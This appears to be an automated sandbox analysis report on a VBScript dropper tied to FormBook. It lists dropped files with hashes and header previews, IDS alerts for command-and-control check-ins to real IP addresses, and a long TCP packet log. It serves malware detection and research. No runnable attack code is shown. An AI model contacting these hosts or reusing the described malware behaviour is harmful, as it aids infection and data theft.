                                    2948_001.xlsGet hashmaliciousFormBookBrowse
                                      P.No._Po1344_Jai_Ma_Jalpa.xlsGet hashmaliciousFormBook, PlayBrowse
                                        order.xlsGet hashmaliciousFormBookBrowse
                                          Swift-Payment-Notification-MsgID-201J928536Y6EDJ2.xlsGet hashmaliciousFormBookBrowse

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sqlite-dll-win32-x86-3320000[1].zip

                                            Download File
                                            Process:C:\Windows\SysWOW64\gpupdate.exe
                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                            Category:dropped
                                            Size (bytes):498103
                                            Entropy (8bit):7.999020978238163
                                            Encrypted:true
                                            SSDEEP:12288:bMWSkjToZ5KMgr2cFEnSsHWrXBUEbH2xbHfToXHAapq:bMWSMTonH1HHWjBvkfTmgCq
                                            MD5:1E73CACCE02AE20026A81F1E56416AA3
                                            SHA1:F491A7301CE11CF11A92C0245C7E03D927422286
                                            SHA-256:0DD0DD38CDE5A14E7D6D0830DB62CC7037E521FD042B0B8DA0763128B2C0B3F2
                                            SHA-512:AFE77FACD8B16CC744AC2277414FFAF83436999D15EB8AC707F8098E2F8ED4CB29B430392EBE46B7FA65B20730615BC33DEE9416F7141DA5032A630894980A0A
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview:PK........;..P.f.c...........sqlite3.defUT...B'.^B'.^ux.................&....6......9.$..(l.nv0x.......t#..9.............?...?...".9.d.1[..#.%......!...y.I.o...2._Z.0.......q..Z..pT.."&m......b.3E.-..g.........&..G..Lh.o#..98..]<....j.K...>...VwJ....n.<G...8...N..%.WW..W..M\.Y45@.A.`c..,.......F..5H....D1=G...o.X.e.u..X`y* ......w..Ia?.;T...r..#s..._p.Y...O+|0..I..W..J.#..Y.65.@D.<<....J..h .6.r`-.L..w....7.....{l..H.g.....t.ieV..aR[,S..*...i...S.]...(8e+..]x4.h.;.w.K...v..QN:....m....XHJ.;..90a._h.Y..Xu$.U...H:3...d.....L....g..P..v....bM.)F.C..*t.(.._.j..... +....b.y.*sn....~k.....Ps4|.L..Z..@@.r..z.n....:.$.'.7...Y.`.......6:#.S...'.Lw....g.3..a.......H:2.L.Cj<.l..#.w....Ch......)......G...nW.+...o=e.p..Z...zpA8{U."..PQ.h.a.O..Y.:......v....!9..<Bb..-...r...*..|....:..9.E.Df....1.9...{...w....{..+...]..Dh=..!+...e#w).p.E(.c.....|i..;..M.C..Rx..{..v7(.....1.'..7 Op.=..K.a..al.L...P.<..b............y...Vg....^....(..UB..:....'..+|}...41......i8].K

                                            C:\Users\user\AppData\Local\Temp\5-038439N

                                            Download File
                                            Process:C:\Windows\SysWOW64\gpupdate.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                            Category:dropped
                                            Size (bytes):77824
                                            Entropy (8bit):1.133993246026424
                                            Encrypted:false
                                            SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                            MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                            SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                            SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                            SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Temp\sqlite3.def

                                            Download File
                                            Process:C:\Windows\SysWOW64\gpupdate.exe
                                            File Type:ASCII text
                                            Category:dropped
                                            Size (bytes):5793
                                            Entropy (8bit):4.353407372858275
                                            Encrypted:false
                                            SSDEEP:96:GcuN/gR+7Ggb9XdMcAM3KOGOF++hwIMtvaENw+Y0aR:E/Q+7Ggb9bKOBF++eHvaENw+cR
                                            MD5:540F7AB54D3B2E6E69222DE98BB6B10E
                                            SHA1:55FA5084EE581043A071F77D604A21DB8D584424
                                            SHA-256:C07C024BF43D8BA619740174D104EACE6C3576CAB357F4A2B0A29B8FD88164DC
                                            SHA-512:E21C1AC8313446C4D482839938784F626F33EF2BED681209839DC5A9CEC856FD1595C8B017CADA857EAA537F5C5BE73F85845C7808EAB209BF9C77B339876119
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview:EXPORTS.sqlite3_aggregate_context.sqlite3_aggregate_count.sqlite3_auto_extension.sqlite3_backup_finish.sqlite3_backup_init.sqlite3_backup_pagecount.sqlite3_backup_remaining.sqlite3_backup_step.sqlite3_bind_blob.sqlite3_bind_blob64.sqlite3_bind_double.sqlite3_bind_int.sqlite3_bind_int64.sqlite3_bind_null.sqlite3_bind_parameter_count.sqlite3_bind_parameter_index.sqlite3_bind_parameter_name.sqlite3_bind_pointer.sqlite3_bind_text.sqlite3_bind_text16.sqlite3_bind_text64.sqlite3_bind_value.sqlite3_bind_zeroblob.sqlite3_bind_zeroblob64.sqlite3_blob_bytes.sqlite3_blob_close.sqlite3_blob_open.sqlite3_blob_read.sqlite3_blob_reopen.sqlite3_blob_write.sqlite3_busy_handler.sqlite3_busy_timeout.sqlite3_cancel_auto_extension.sqlite3_changes.sqlite3_clear_bindings.sqlite3_close.sqlite3_close_v2.sqlite3_collation_needed.sqlite3_collation_needed16.sqlite3_column_blob.sqlite3_column_bytes.sqlite3_column_bytes16.sqlite3_column_count.sqlite3_column_database_name.sqlite3_column_database_name16.sqlite3_colum

                                            C:\Users\user\AppData\Local\Temp\sqlite3.dll

                                            Download File
                                            Process:C:\Windows\SysWOW64\gpupdate.exe
                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):949372
                                            Entropy (8bit):6.5082656306562665
                                            Encrypted:false
                                            SSDEEP:24576:FMhZiQ/0DW4Qi1y534gZZ0LgQn5ArvSy4T/4gW:FtDW49k5IiC5n5Ardz
                                            MD5:7FD80B1CC72DC580C02CA4CFBFB2592D
                                            SHA1:18DA905AF878B27151B359CF1A7D0A650764E8A1
                                            SHA-256:1E6DCCBDF8527ABB53C289DA920463B7895300D0D984CC7E91A3ECDA4E673190
                                            SHA-512:13F7F29B5ED31C551AA5F27742557AA4D026A226087D6FCBCA094819759ECC753A2C33B7422AE88DC6A4A0A966EDB8485A18E59A0283BA2686CAE5D78E0190A3
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Joe Sandbox View:
                                            • Filename: 350.xls, Detection: malicious, Browse
                                            • Filename: Scan Doc.docx.doc, Detection: malicious, Browse
                                            • Filename: Invoices.xls, Detection: malicious, Browse
                                            • Filename: Quotation_package_RFQ_10750.xls, Detection: malicious, Browse
                                            • Filename: pol.xlam.xlsx, Detection: malicious, Browse
                                            • Filename: Import GeorgiaTbilisi GANSKHVAVEBULI IT 43036.xls, Detection: malicious, Browse
                                            • Filename: 2948_001.xls, Detection: malicious, Browse
                                            • Filename: P.No._Po1344_Jai_Ma_Jalpa.xls, Detection: malicious, Browse
                                            • Filename: order.xls, Detection: malicious, Browse
                                            • Filename: Swift-Payment-Notification-MsgID-201J928536Y6EDJ2.xls, Detection: malicious, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B'.^....c......!.........v.....................a......................... .......}........ ......................0..."...`..H................................5...................................................a...............................text...............................`.P`.data...|...........................@.`..rdata..4(.......*..................@.`@.bss....(.... ........................`..edata..."...0...$..................@.0@.idata..H....`......................@.0..CRT....,....p.......<..............@.0..tls.... ............>..............@.0..rsrc................@..............@.0..reloc...5.......6...F..............@.0B/4...................|..............@.@B/19................................@..B/31.................................@..B/45..................6..............@..B/57..................R..............@.0B/70.....i............\..

                                            C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe

                                            Download File
                                            Process:C:\Windows\System32\wscript.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):833536
                                            Entropy (8bit):7.954091244042312
                                            Encrypted:false
                                            SSDEEP:24576:YVBZgsmHAszMh/MHNiZFollKHK4EFfaeOobGm:YwHAxwiZhq7taZYG
                                            MD5:E4CD22AA149644D6606290EBF0375D67
                                            SHA1:F5B2FF35CEE24C6FE083CE95409BEBE92DE97F9D
                                            SHA-256:730727AF6C83F7C10C6CFC7E4EA4ECE4466C0AF49D7AA1C1652C2F7E38CD62EB
                                            SHA-512:7F1F82C830052288BF461CA3BF8683E1F04958EBA3428400784E5CBBA8FF52E5A1D8D82A010F81580EB3E3808941C61DFFE8CA0D7FFCAACF31C6228E8C1E4EA1
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....A................................... ........@.. .......................@............`.................................p...K............................ ....../................................................ ............... ..H............text....... ...................... ..`.sdata..............................@....rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Temp\wvhp9nsh.zip

                                            Download File
                                            Process:C:\Windows\SysWOW64\gpupdate.exe
                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                            Category:dropped
                                            Size (bytes):498103
                                            Entropy (8bit):7.999020978238163
                                            Encrypted:true
                                            SSDEEP:12288:bMWSkjToZ5KMgr2cFEnSsHWrXBUEbH2xbHfToXHAapq:bMWSMTonH1HHWjBvkfTmgCq
                                            MD5:1E73CACCE02AE20026A81F1E56416AA3
                                            SHA1:F491A7301CE11CF11A92C0245C7E03D927422286
                                            SHA-256:0DD0DD38CDE5A14E7D6D0830DB62CC7037E521FD042B0B8DA0763128B2C0B3F2
                                            SHA-512:AFE77FACD8B16CC744AC2277414FFAF83436999D15EB8AC707F8098E2F8ED4CB29B430392EBE46B7FA65B20730615BC33DEE9416F7141DA5032A630894980A0A
                                            Malicious:false
                                            Preview:PK........;..P.f.c...........sqlite3.defUT...B'.^B'.^ux.................&....6......9.$..(l.nv0x.......t#..9.............?...?...".9.d.1[..#.%......!...y.I.o...2._Z.0.......q..Z..pT.."&m......b.3E.-..g.........&..G..Lh.o#..98..]<....j.K...>...VwJ....n.<G...8...N..%.WW..W..M\.Y45@.A.`c..,.......F..5H....D1=G...o.X.e.u..X`y* ......w..Ia?.;T...r..#s..._p.Y...O+|0..I..W..J.#..Y.65.@D.<<....J..h .6.r`-.L..w....7.....{l..H.g.....t.ieV..aR[,S..*...i...S.]...(8e+..]x4.h.;.w.K...v..QN:....m....XHJ.;..90a._h.Y..Xu$.U...H:3...d.....L....g..P..v....bM.)F.C..*t.(.._.j..... +....b.y.*sn....~k.....Ps4|.L..Z..@@.r..z.n....:.$.'.7...Y.`.......6:#.S...'.Lw....g.3..a.......H:2.L.Cj<.l..#.w....Ch......)......G...nW.+...o=e.p..Z...zpA8{U."..PQ.h.a.O..Y.:......v....!9..<Bb..-...r...*..|....:..9.E.Df....1.9...{...w....{..+...]..Dh=..!+...e#w).p.E(.c.....|i..;..M.C..Rx..{..v7(.....1.'..7 Op.=..K.a..al.L...P.<..b............y...Vg....^....(..UB..:....'..+|}...41......i8].K

                                            Static File Info

                                            General

                                            File type:ASCII text, with very long lines (64440), with CRLF line terminators
                                            Entropy (8bit):5.873695850716542
                                            TrID:
                                            • Visual Basic Script (13500/0) 100.00%
                                            File name:0CkEHZjZgO.vbs
                                            File size:1'316'012 bytes
                                            MD5:479fe21d1995faa9e2f152dfae09e949
                                            SHA1:dddd6e905fc5d63c79f4c58b47f1333ada7939e5
                                            SHA256:4a9154e1accebc00701886ac29a82e973abbbf4141ec9b4af5f505d1b4da0e36
                                            SHA512:0f4b1a2448adbc79d5000a774cc9f4bfce312b5319d2852d1d0c56ade3c70feb3d4ac2ab9eaa2daebcf8c7ec234fb1be605d2a54d8b317a96e533e4fadc3a895
                                            SSDEEP:24576:g8w532GoFtmNqTbMQsbLSDHr1lrYYWpB/BRwVccG/xkI2W/Y73TBw77:sUGcsbenYYWZsWcG/sTNC7
                                            TLSH:4C55E052FF563F4C3C61C2E1282FBA459DCDADFB02B4EAE9D03E32152981991055FA39
                                            File Content Preview:Option Explicit....'======================================..' Configuration Constants..'======================================..Const TEMP_FOLDER = 2..Const INIT_DELAY_MIN_MS = 3000..Const INIT_DELAY_MAX_MS = 7000..Const EXEC_DELAY_MIN_MS = 2000..Const EX

                                            File Icon

                                            Icon Hash:68d69b8f86ab9a86

                                            Network Behavior

                                            Suricata IDS Alerts

                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                            2024-11-12T11:19:42.434600+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.2249165208.91.197.2780TCP
                                            2024-11-12T11:19:42.434600+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.2249165208.91.197.2780TCP
                                            2024-11-12T11:19:57.548221+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.224916715.197.148.3380TCP
                                            2024-11-12T11:20:00.711578+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.224916815.197.148.3380TCP
                                            2024-11-12T11:20:02.631880+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.224916915.197.148.3380TCP
                                            2024-11-12T11:20:21.039977+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.224917015.197.148.3380TCP
                                            2024-11-12T11:20:21.039977+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.224917015.197.148.3380TCP
                                            2024-11-12T11:20:26.150213+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249171162.213.249.21680TCP
                                            2024-11-12T11:20:29.407500+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249172162.213.249.21680TCP
                                            2024-11-12T11:20:31.227335+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2249173162.213.249.21680TCP
                                            2024-11-12T11:20:34.481167+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.2249174162.213.249.21680TCP
                                            2024-11-12T11:20:34.481167+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.2249174162.213.249.21680TCP

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 12, 2024 11:19:41.393860102 CET4916580192.168.2.22208.91.197.27
                                            Nov 12, 2024 11:19:41.398910046 CET8049165208.91.197.27192.168.2.22
                                            Nov 12, 2024 11:19:41.398992062 CET4916580192.168.2.22208.91.197.27
                                            Nov 12, 2024 11:19:41.406984091 CET4916580192.168.2.22208.91.197.27
                                            Nov 12, 2024 11:19:41.412059069 CET8049165208.91.197.27192.168.2.22
                                            Nov 12, 2024 11:19:42.434348106 CET8049165208.91.197.27192.168.2.22
                                            Nov 12, 2024 11:19:42.434370041 CET8049165208.91.197.27192.168.2.22
                                            Nov 12, 2024 11:19:42.434381962 CET8049165208.91.197.27192.168.2.22
                                            Nov 12, 2024 11:19:42.434391975 CET8049165208.91.197.27192.168.2.22
                                            Nov 12, 2024 11:19:42.434600115 CET4916580192.168.2.22208.91.197.27
                                            Nov 12, 2024 11:19:42.435848951 CET8049165208.91.197.27192.168.2.22
                                            Nov 12, 2024 11:19:42.435923100 CET4916580192.168.2.22208.91.197.27
                                            Nov 12, 2024 11:19:42.442982912 CET4916580192.168.2.22208.91.197.27
                                            Nov 12, 2024 11:19:42.447894096 CET8049165208.91.197.27192.168.2.22
                                            Nov 12, 2024 11:19:47.173917055 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:47.178803921 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.178877115 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:47.184221983 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:47.189239025 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.772578001 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.772643089 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:47.772840023 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.772855043 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.772866964 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.772880077 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.772891045 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:47.772896051 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.772900105 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:47.772910118 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.772921085 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:47.772926092 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.772938013 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:47.772938967 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.772947073 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:47.772954941 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.772972107 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:47.772983074 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:47.772989035 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:47.777530909 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.777551889 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.777582884 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:47.777595997 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:47.801471949 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:47.889605999 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.889621973 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.889632940 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.889643908 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.889656067 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.889663935 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:47.889679909 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:47.889698982 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:47.889797926 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.889841080 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:47.889844894 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.889862061 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.889883995 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.889889956 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:47.889895916 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.889904976 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:47.889909029 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.889919996 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:47.889935017 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:47.889941931 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:47.890774965 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.890820026 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:47.890829086 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.890841007 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.890862942 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.890872955 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:47.890902042 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:47.891294003 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.891340017 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:47.891347885 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.891360044 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.891388893 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:47.891422033 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.891442060 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.891450882 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.891474962 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:47.891485929 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:47.892270088 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.892313004 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:47.894557953 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.894596100 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:47.939953089 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.939966917 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.939981937 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:47.940045118 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.006817102 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.006859064 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.006875992 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.006876945 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.006889105 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.006900072 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.006901026 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.006912947 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.006912947 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.006927013 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.006930113 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.006941080 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.006953001 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.006954908 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.006963968 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.006963968 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.006973982 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.006977081 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.006989002 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.006990910 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.006999016 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.007004023 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.007016897 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.007023096 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.007036924 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.007039070 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.007039070 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.007047892 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.007057905 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.007076979 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.007236958 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.007258892 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.007271051 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.007282972 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.007282972 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.007291079 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.007298946 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.007304907 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.007327080 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.007335901 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.007703066 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.007724047 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.007735968 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.007749081 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.007749081 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.007757902 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.007762909 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.007774115 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.007776976 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.007785082 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.007792950 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.007800102 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.007808924 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.007818937 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.007822990 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.007827044 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.007836103 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.007858992 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.007858992 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.007877111 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.007929087 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.008583069 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.008594990 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.008608103 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.008620024 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.008630991 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.008640051 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.008641005 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.008657932 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.008660078 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.008666039 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.008670092 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.008680105 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.008682013 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.008694887 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.008693933 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.008702993 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.008709908 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.008725882 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.008733034 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.008750916 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.008791924 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.009464979 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.009478092 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.009490013 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.009500980 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.009512901 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.009526014 CET4916680192.168.2.2245.33.6.223
